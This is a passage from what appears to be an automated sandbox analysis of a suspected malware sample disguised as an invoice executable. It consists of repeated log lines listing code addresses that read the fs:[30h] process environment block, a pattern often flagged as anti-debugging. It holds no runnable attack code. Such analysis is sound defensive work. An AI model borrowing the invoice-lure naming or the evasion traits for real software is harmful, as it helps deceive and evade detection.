          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01088550 mov eax, dword ptr fs:[00000030h]4_2_01088550
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01088550 mov eax, dword ptr fs:[00000030h]4_2_01088550
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010B656A mov eax, dword ptr fs:[00000030h]4_2_010B656A
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010B656A mov eax, dword ptr fs:[00000030h]4_2_010B656A
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010B656A mov eax, dword ptr fs:[00000030h]4_2_010B656A
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010B4588 mov eax, dword ptr fs:[00000030h]4_2_010B4588
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01082582 mov eax, dword ptr fs:[00000030h]4_2_01082582
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01082582 mov ecx, dword ptr fs:[00000030h]4_2_01082582
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010BE59C mov eax, dword ptr fs:[00000030h]4_2_010BE59C
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011005A7 mov eax, dword ptr fs:[00000030h]4_2_011005A7
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011005A7 mov eax, dword ptr fs:[00000030h]4_2_011005A7
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011005A7 mov eax, dword ptr fs:[00000030h]4_2_011005A7
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010A45B1 mov eax, dword ptr fs:[00000030h]4_2_010A45B1
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010A45B1 mov eax, dword ptr fs:[00000030h]4_2_010A45B1
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010BE5CF mov eax, dword ptr fs:[00000030h]4_2_010BE5CF
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010BE5CF mov eax, dword ptr fs:[00000030h]4_2_010BE5CF
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010865D0 mov eax, dword ptr fs:[00000030h]4_2_010865D0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010BA5D0 mov eax, dword ptr fs:[00000030h]4_2_010BA5D0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010BA5D0 mov eax, dword ptr fs:[00000030h]4_2_010BA5D0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010BC5ED mov eax, dword ptr fs:[00000030h]4_2_010BC5ED
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010BC5ED mov eax, dword ptr fs:[00000030h]4_2_010BC5ED
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010825E0 mov eax, dword ptr fs:[00000030h]4_2_010825E0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010AE5E7 mov eax, dword ptr fs:[00000030h]4_2_010AE5E7
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010AE5E7 mov eax, dword ptr fs:[00000030h]4_2_010AE5E7
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010AE5E7 mov eax, dword ptr fs:[00000030h]4_2_010AE5E7
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010AE5E7 mov eax, dword ptr fs:[00000030h]4_2_010AE5E7
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010AE5E7 mov eax, dword ptr fs:[00000030h]4_2_010AE5E7
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010AE5E7 mov eax, dword ptr fs:[00000030h]4_2_010AE5E7
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010AE5E7 mov eax, dword ptr fs:[00000030h]4_2_010AE5E7
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010AE5E7 mov eax, dword ptr fs:[00000030h]4_2_010AE5E7
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010B8402 mov eax, dword ptr fs:[00000030h]4_2_010B8402
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010B8402 mov eax, dword ptr fs:[00000030h]4_2_010B8402
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010B8402 mov eax, dword ptr fs:[00000030h]4_2_010B8402
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0107C427 mov eax, dword ptr fs:[00000030h]4_2_0107C427
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0107E420 mov eax, dword ptr fs:[00000030h]4_2_0107E420
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0107E420 mov eax, dword ptr fs:[00000030h]4_2_0107E420
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0107E420 mov eax, dword ptr fs:[00000030h]4_2_0107E420
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01106420 mov eax, dword ptr fs:[00000030h]4_2_01106420
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01106420 mov eax, dword ptr fs:[00000030h]4_2_01106420
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01106420 mov eax, dword ptr fs:[00000030h]4_2_01106420
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01106420 mov eax, dword ptr fs:[00000030h]4_2_01106420
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01106420 mov eax, dword ptr fs:[00000030h]4_2_01106420
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01106420 mov eax, dword ptr fs:[00000030h]4_2_01106420
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01106420 mov eax, dword ptr fs:[00000030h]4_2_01106420
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010BA430 mov eax, dword ptr fs:[00000030h]4_2_010BA430
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0113A456 mov eax, dword ptr fs:[00000030h]4_2_0113A456
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010BE443 mov eax, dword ptr fs:[00000030h]4_2_010BE443
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010BE443 mov eax, dword ptr fs:[00000030h]4_2_010BE443
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010BE443 mov eax, dword ptr fs:[00000030h]4_2_010BE443
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010BE443 mov eax, dword ptr fs:[00000030h]4_2_010BE443
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010BE443 mov eax, dword ptr fs:[00000030h]4_2_010BE443
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010BE443 mov eax, dword ptr fs:[00000030h]4_2_010BE443
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010BE443 mov eax, dword ptr fs:[00000030h]4_2_010BE443
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010BE443 mov eax, dword ptr fs:[00000030h]4_2_010BE443
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010A245A mov eax, dword ptr fs:[00000030h]4_2_010A245A
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0107645D mov eax, dword ptr fs:[00000030h]4_2_0107645D
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0110C460 mov ecx, dword ptr fs:[00000030h]4_2_0110C460
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010AA470 mov eax, dword ptr fs:[00000030h]4_2_010AA470
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010AA470 mov eax, dword ptr fs:[00000030h]4_2_010AA470
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010AA470 mov eax, dword ptr fs:[00000030h]4_2_010AA470
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0113A49A mov eax, dword ptr fs:[00000030h]4_2_0113A49A
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0110A4B0 mov eax, dword ptr fs:[00000030h]4_2_0110A4B0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010864AB mov eax, dword ptr fs:[00000030h]4_2_010864AB
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010B44B0 mov ecx, dword ptr fs:[00000030h]4_2_010B44B0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010804E5 mov ecx, dword ptr fs:[00000030h]4_2_010804E5
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010BC700 mov eax, dword ptr fs:[00000030h]4_2_010BC700
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01080710 mov eax, dword ptr fs:[00000030h]4_2_01080710
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010B0710 mov eax, dword ptr fs:[00000030h]4_2_010B0710
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010BC720 mov eax, dword ptr fs:[00000030h]4_2_010BC720
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010BC720 mov eax, dword ptr fs:[00000030h]4_2_010BC720
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010B273C mov eax, dword ptr fs:[00000030h]4_2_010B273C
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010B273C mov ecx, dword ptr fs:[00000030h]4_2_010B273C
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010B273C mov eax, dword ptr fs:[00000030h]4_2_010B273C
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010FC730 mov eax, dword ptr fs:[00000030h]4_2_010FC730
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01104755 mov eax, dword ptr fs:[00000030h]4_2_01104755
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010B674D mov esi, dword ptr fs:[00000030h]4_2_010B674D
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010B674D mov eax, dword ptr fs:[00000030h]4_2_010B674D
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010B674D mov eax, dword ptr fs:[00000030h]4_2_010B674D
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0110E75D mov eax, dword ptr fs:[00000030h]4_2_0110E75D
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01080750 mov eax, dword ptr fs:[00000030h]4_2_01080750
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C2750 mov eax, dword ptr fs:[00000030h]4_2_010C2750
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C2750 mov eax, dword ptr fs:[00000030h]4_2_010C2750
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01088770 mov eax, dword ptr fs:[00000030h]4_2_01088770
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01090770 mov eax, dword ptr fs:[00000030h]4_2_01090770
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01090770 mov eax, dword ptr fs:[00000030h]4_2_01090770
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01090770 mov eax, dword ptr fs:[00000030h]4_2_01090770
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01090770 mov eax, dword ptr fs:[00000030h]4_2_01090770
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01090770 mov eax, dword ptr fs:[00000030h]4_2_01090770
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01090770 mov eax, dword ptr fs:[00000030h]4_2_01090770
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01090770 mov eax, dword ptr fs:[00000030h]4_2_01090770
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01090770 mov eax, dword ptr fs:[00000030h]4_2_01090770
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01090770 mov eax, dword ptr fs:[00000030h]4_2_01090770
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01090770 mov eax, dword ptr fs:[00000030h]4_2_01090770
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01090770 mov eax, dword ptr fs:[00000030h]4_2_01090770
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01090770 mov eax, dword ptr fs:[00000030h]4_2_01090770
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0112678E mov eax, dword ptr fs:[00000030h]4_2_0112678E
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010807AF mov eax, dword ptr fs:[00000030h]4_2_010807AF
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011347A0 mov eax, dword ptr fs:[00000030h]4_2_011347A0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0108C7C0 mov eax, dword ptr fs:[00000030h]4_2_0108C7C0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011007C3 mov eax, dword ptr fs:[00000030h]4_2_011007C3
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010A27ED mov eax, dword ptr fs:[00000030h]4_2_010A27ED
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010A27ED mov eax, dword ptr fs:[00000030h]4_2_010A27ED
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010A27ED mov eax, dword ptr fs:[00000030h]4_2_010A27ED
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0110E7E1 mov eax, dword ptr fs:[00000030h]4_2_0110E7E1
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010847FB mov eax, dword ptr fs:[00000030h]4_2_010847FB
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010847FB mov eax, dword ptr fs:[00000030h]4_2_010847FB
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0109260B mov eax, dword ptr fs:[00000030h]4_2_0109260B
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0109260B mov eax, dword ptr fs:[00000030h]4_2_0109260B
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0109260B mov eax, dword ptr fs:[00000030h]4_2_0109260B
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0109260B mov eax, dword ptr fs:[00000030h]4_2_0109260B
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0109260B mov eax, dword ptr fs:[00000030h]4_2_0109260B
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0109260B mov eax, dword ptr fs:[00000030h]4_2_0109260B
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0109260B mov eax, dword ptr fs:[00000030h]4_2_0109260B
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010FE609 mov eax, dword ptr fs:[00000030h]4_2_010FE609
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C2619 mov eax, dword ptr fs:[00000030h]4_2_010C2619
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0108262C mov eax, dword ptr fs:[00000030h]4_2_0108262C
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010B6620 mov eax, dword ptr fs:[00000030h]4_2_010B6620
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010B8620 mov eax, dword ptr fs:[00000030h]4_2_010B8620
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0109E627 mov eax, dword ptr fs:[00000030h]4_2_0109E627
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0109C640 mov eax, dword ptr fs:[00000030h]4_2_0109C640
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010BA660 mov eax, dword ptr fs:[00000030h]4_2_010BA660
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010BA660 mov eax, dword ptr fs:[00000030h]4_2_010BA660
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0114866E mov eax, dword ptr fs:[00000030h]4_2_0114866E
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0114866E mov eax, dword ptr fs:[00000030h]4_2_0114866E
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010B2674 mov eax, dword ptr fs:[00000030h]4_2_010B2674
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01084690 mov eax, dword ptr fs:[00000030h]4_2_01084690
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01084690 mov eax, dword ptr fs:[00000030h]4_2_01084690
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010BC6A6 mov eax, dword ptr fs:[00000030h]4_2_010BC6A6
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010B66B0 mov eax, dword ptr fs:[00000030h]4_2_010B66B0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010BA6C7 mov ebx, dword ptr fs:[00000030h]4_2_010BA6C7
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010BA6C7 mov eax, dword ptr fs:[00000030h]4_2_010BA6C7
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011006F1 mov eax, dword ptr fs:[00000030h]4_2_011006F1
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011006F1 mov eax, dword ptr fs:[00000030h]4_2_011006F1
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010FE6F2 mov eax, dword ptr fs:[00000030h]4_2_010FE6F2
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010FE6F2 mov eax, dword ptr fs:[00000030h]4_2_010FE6F2
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010FE6F2 mov eax, dword ptr fs:[00000030h]4_2_010FE6F2
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010FE6F2 mov eax, dword ptr fs:[00000030h]4_2_010FE6F2
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0110C912 mov eax, dword ptr fs:[00000030h]4_2_0110C912
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010FE908 mov eax, dword ptr fs:[00000030h]4_2_010FE908
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010FE908 mov eax, dword ptr fs:[00000030h]4_2_010FE908
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01078918 mov eax, dword ptr fs:[00000030h]4_2_01078918
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01078918 mov eax, dword ptr fs:[00000030h]4_2_01078918
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0110892A mov eax, dword ptr fs:[00000030h]4_2_0110892A
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0111892B mov eax, dword ptr fs:[00000030h]4_2_0111892B
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01154940 mov eax, dword ptr fs:[00000030h]4_2_01154940
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01100946 mov eax, dword ptr fs:[00000030h]4_2_01100946
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C096E mov eax, dword ptr fs:[00000030h]4_2_010C096E
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C096E mov edx, dword ptr fs:[00000030h]4_2_010C096E
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C096E mov eax, dword ptr fs:[00000030h]4_2_010C096E
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010A6962 mov eax, dword ptr fs:[00000030h]4_2_010A6962
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010A6962 mov eax, dword ptr fs:[00000030h]4_2_010A6962
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010A6962 mov eax, dword ptr fs:[00000030h]4_2_010A6962
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01124978 mov eax, dword ptr fs:[00000030h]4_2_01124978
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01124978 mov eax, dword ptr fs:[00000030h]4_2_01124978
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0110C97C mov eax, dword ptr fs:[00000030h]4_2_0110C97C
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011089B3 mov esi, dword ptr fs:[00000030h]4_2_011089B3
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011089B3 mov eax, dword ptr fs:[00000030h]4_2_011089B3
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_011089B3 mov eax, dword ptr fs:[00000030h]4_2_011089B3
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010809AD mov eax, dword ptr fs:[00000030h]4_2_010809AD
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010809AD mov eax, dword ptr fs:[00000030h]4_2_010809AD
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010929A0 mov eax, dword ptr fs:[00000030h]4_2_010929A0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010929A0 mov eax, dword ptr fs:[00000030h]4_2_010929A0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010929A0 mov eax, dword ptr fs:[00000030h]4_2_010929A0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010929A0 mov eax, dword ptr fs:[00000030h]4_2_010929A0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010929A0 mov eax, dword ptr fs:[00000030h]4_2_010929A0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010929A0 mov eax, dword ptr fs:[00000030h]4_2_010929A0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010929A0 mov eax, dword ptr fs:[00000030h]4_2_010929A0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010929A0 mov eax, dword ptr fs:[00000030h]4_2_010929A0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010929A0 mov eax, dword ptr fs:[00000030h]4_2_010929A0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010929A0 mov eax, dword ptr fs:[00000030h]4_2_010929A0
